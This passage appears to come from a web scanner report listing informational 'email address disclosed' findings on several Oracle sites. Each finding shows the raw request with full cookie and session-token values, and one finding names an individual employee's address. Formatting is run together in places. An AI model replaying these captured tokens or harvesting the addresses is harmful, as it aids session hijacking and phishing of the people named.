GET /campus/HR/script/s_code.js HTTP/1.1/campus/HR/global_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server...[SNIP]... =s.mr($1,(vt#Rt`avt)`n+"^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc @1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@";s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s...[SNIP]...
13.7. https://campus.oracle.com/campus/HR/sg_main.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/sg_main.html
Issue detail
The following email address was disclosed in the response:campusrelations_sg@oracle.com
Request
GET /campus/HR/sg_main.html HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .oracle.com/campus/HR/images/oralogo_linkedin.png" data-jobTitle="Current Openings Available" data-jobLocation="Singapore" data-themecolor="#959595" data-email="campusrelations_sg@oracle.com ">...[SNIP]...
13.8. https://campus.oracle.com/campus/HR/zealand-apply.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/zealand-apply.html
Issue detail
The following email address was disclosed in the response:campusrelations_au@oracle.com
Request
GET /campus/HR/zealand-apply.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/zealand_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... campusrelations_au@oracle.com ?subject=Resume%20-%20Campus%20Website" class="style3 link">campusrelations_au@oracle.com </a>...[SNIP]...
13.9. https://campus.oracle.com/campus/campus_feed.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/campus_feed.xml
Issue detail
The following email address was disclosed in the response:supriya.aggarwal@oracle.com
Request
GET /campus/campus_feed.xml HTTP/1.1
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server.oracle.com</link>...[SNIP]... supriya.aggarwal@oracle.com </managingEditor>supriya.aggarwal@oracle.com </webMaster>...[SNIP]...
13.10. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html
Issue detail
The following email addresses were disclosed in the response:campusrelations_jp@oracle.com uFF1Acampusrelations_jp@oracle.com
Request
GET /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/gwt/otn.todo.TodoApp/TodoApp.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/head><body><script><!--.core.client.',qbc='com.google.gwt.http.client.'...[SNIP]... campusrelations_jp@oracle.com <br/>...[SNIP]... \u305B\u30E1\u30FC\u30EB\u30A2\u30C9\u30EC\u30B9\uFF08\u65B0\u5352\u63A1\u7528\uFF1Acampusrelations_jp@oracle.com \uFF09<br />...[SNIP]...
13.11. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/adapter/ext/ext-base.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/gwt/otn.todo.TodoApp/js/ext/adapter/ext/ext-base.js
Issue detail
The following email address was disclosed in the response:
Request
GET /campus/gwt/otn.todo.TodoApp/js/ext/adapter/ext/ext-base.js HTTP/1.1/campus/gwt/otn.todo.TodoApp/TodoApp.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Serverlicensing@extjs.com ;window["undefined"]=window["undefined"];Ext.apply=function(C,D,B){if(B){Ext.apply(C,B)}if(C&&D&&typeof D=="object"){for(var A in D){C[A]...[SNIP]...
13.12. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/ext-all.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/gwt/otn.todo.TodoApp/js/ext/ext-all.js
Issue detail
The following email addresses were disclosed in the response:licensing@extjs.com user@domain.com
Request
GET /campus/gwt/otn.todo.TodoApp/js/ext/ext-all.js HTTP/1.1/campus/gwt/otn.todo.TodoApp/TodoApp.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Serverlicensing@extjs.com {var L=null;var F=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i;var B=/^table|tbody|tr|td$/i;var A=function...[SNIP]... ]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{"email":function(E){return B.test(E)},"emailText":"This field should be an e-mail address in the format \"user@domain.com \"","emailMask":/[a-z0-9_\.\-@]/i,"url":function(E){return A.test(E)},"urlText":"This field should be a URL in the format \"http:/"+"/www.domain.com\"","alpha":function(E){return C.test(E)},"alphaText"...[SNIP]...
13.13. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/resources/css/ext-all.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/gwt/otn.todo.TodoApp/js/ext/resources/css/ext-all.css
Issue detail
The following email address was disclosed in the response:
Request
GET /campus/gwt/otn.todo.TodoApp/js/ext/resources/css/ext-all.css HTTP/1.1/campus/gwt/otn.todo.TodoApp/TodoApp.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Serverlicensing@extjs.com ,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,p,blockquote,th,td{margin:0;padding:0;}...[SNIP]...
13.14. http://crmondemand.oracle.com/error/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://crmondemand.oracle.com
Path:
/error/s_code.js
Issue detail
The following email address was disclosed in the response:
Request
GET /error/s_code.js HTTP/1.1
Response
HTTP/1.1 200 OK653a40"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=300+0;age=0;ecid=49402403647881011,0:1)...[SNIP]... =s.mr($1,(vt#Rt`avt)`n+"^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc @1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@";s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s...[SNIP]...
13.15. https://irecruitment.oracle.com/OA_HTML/OA.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/OA.jsp
Issue detail
The following email address was disclosed in the response:irecruitsupport_us@oracle.com
Request
GET /OA_HTML/OA.jsp?page=/oracle/apps/irc/candidateSelfService/webui/VisHomePG&_ri=821&OAPB=IRC_BRAND&_ti=209088196&oapc=2&OAMC=1053761_30_0&menu=Y&oaMenuLevel=1&oas=U0LRYcVUwxg759o0SbpSdQ.. HTTP/1.1
Response
HTTP/1.1 200 OKd59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure<head><title>iRecruitment Visitor Home Page</title><meta name="generator...[SNIP]... _USEFULLINK_CONTACT" name="MIS_IRC_EXT_REG_USEFULLINK_CONTACT" title="Contact Us *" href="mailto:irecruitsupport_us@oracle.com ?subject=iRecruitment%20User">...[SNIP]...
13.16. https://irecruitment.oracle.com/OA_HTML/RF.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/RF.jsp
Issue detail
The following email address was disclosed in the response:irecruitsupport_us@oracle.com
Request
GET /OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA.. HTTP/1.1.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; gpw_e24=no%20value; s_cc=true; s_sq=%5B%5BB%5D%5D; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C
Response
HTTP/1.1 200 OKd59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure.oracle.com/OA_HTML/OA.jsp<head><title>iRecruitment Visitor Home Page</title><meta name="generator...[SNIP]... _USEFULLINK_CONTACT" name="MIS_IRC_EXT_REG_USEFULLINK_CONTACT" title="Contact Us *" href="mailto:irecruitsupport_us@oracle.com ?subject=iRecruitment%20User">...[SNIP]...
13.17. https://irecruitment.oracle.com/OA_HTML/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/s_code.js
Issue detail
The following email address was disclosed in the response:
Request
GET /OA_HTML/s_code.js HTTP/1.1.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; gpw_e24=no%20value; s_cc=true; s_sq=%5B%5BB%5D%5D; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C
Response
HTTP/1.1 200 OK...[SNIP]... =s.mr($1,(vt#Rt`avt)`n+"^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc @1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@";s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s...[SNIP]...
13.18. https://shop.oracle.com/pls/ostore/f
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://shop.oracle.com
Path:
/pls/ostore/f
Issue detail
The following email addresses were disclosed in the response:oraclehelp_ww@oracle.com oraclesales_us@oracle.com
Request
GET /pls/ostore/f?p=dstore:home:7881107130450135&tz=-5:00 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:home:0;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fproducts%2Fapplications%2Fpeoplesoft-enterprise%2Fhcm%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Fpeoplesoft-enterprise%25252Fhcm%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Astore%25253Astorespareparts%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK-10g...[SNIP]... oraclesales_us@oracle.com ?subject=Oracle Store Inquiry">...[SNIP]... oraclehelp_ww@oracle.com ?subject=Oracle Store Inquiry">...[SNIP]...
13.19. http://solutions.oracle.com/img/opn_navtree.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/img/opn_navtree.js
Issue detail
The following email address was disclosed in the response:
Request
GET /img/opn_navtree.js HTTP/1.1.com/home/basic_search;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=86400+0;age=5867;ecid=169389384283,0).com/scripts/cooltreepro/darknos@cooldev.com >...[SNIP]...
13.20. http://solutions.oracle.com/img/s_code19b.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/img/s_code19b.js
Issue detail
The following email address was disclosed in the response:
Request
GET /img/s_code19b.js HTTP/1.1.com/home/basic_search;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=86400+0;age=86394;ecid=83395554453,1)...[SNIP]... =s.mr($1,(vt#Rt`avt)`n+"^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc @1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@";s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s...[SNIP]...
13.21. http://solutions.oracle.com/portal/page/portal/searchresults
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/page/portal/searchresults
Issue detail
The following email address was disclosed in the response:
Request
POST /portal/page/portal/searchresults HTTP/1.1.com-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.com/home/basic_search;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/home/basic_search; gpw_e24=http%3A//solutions.oracle.com/home/basic_search; s_sq=%5B%5BB%5D%5D+search+faq+contact&mo=containsany&sepg=57&fi=1&fs=57&pu=1&has=&as=2065%2C0&pao=equal&pav=&pan=sc_membership_location&pas=0&p_action=SUBMIT&ll=
Response
HTTP/1.1 200 OK-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=109;ecid=113554883210,0)results/xhtml1/DTD/xhtml1-transitional.dtd"> -->...[SNIP]... ;center><a href="mailto:info@fcs-inc.com " target="_blank"><img src="http://www.fcs-inc.com/images/mail-btn.png" border="0" alt="Mail"></a><a href="http://www.google.co.in/se...[SNIP]...
14. Credit card numbers disclosed
previous
next
There are 2 instances of this issue:
Issue background
